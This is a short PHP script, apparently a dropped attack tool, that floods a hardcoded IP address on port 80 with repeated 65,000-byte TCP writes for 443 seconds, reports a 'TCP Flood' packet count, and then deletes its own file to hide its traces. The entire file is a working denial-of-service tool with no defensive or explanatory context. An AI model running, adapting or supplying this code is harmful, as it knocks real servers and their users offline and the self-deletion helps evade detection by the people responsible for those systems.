<?php
$packets = 0;
ignore_user_abort(FALSE);
set_time_limit(0);
   
$exec_time = "443";
   
$time = time();
echo "Started: ".time('d-m-y h:i:s')."<br>";
$max_time = $time+$exec_time;
 
$host = "95.130.170.180";
$port = "80";
   
for($i=0;$i<65000;$i++){
$out .= 'X';
}
while(1){
$packets++;
if(time() > $max_time){
break;
}   
$fp = fsockopen('tcp://'.$host, $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<br><b>TCP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
unlink(__FILE__);
?>
